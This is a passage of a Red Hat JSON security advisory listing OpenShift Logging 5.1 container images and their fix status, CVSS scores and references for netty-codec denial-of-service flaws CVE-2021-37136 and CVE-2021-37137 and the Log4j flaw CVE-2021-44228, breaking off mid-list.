"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37136" }, { "category": "external", "summary": "RHBZ#2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37136" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:09:12+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to 
upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5128" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data" }, { "cve": "CVE-2021-37137", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004135" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). 
The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] }, "references": 
[ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37137" }, { "category": "external", "summary": "RHBZ#2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37137" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:09:12+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5128" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way" }, { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": 
"2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory 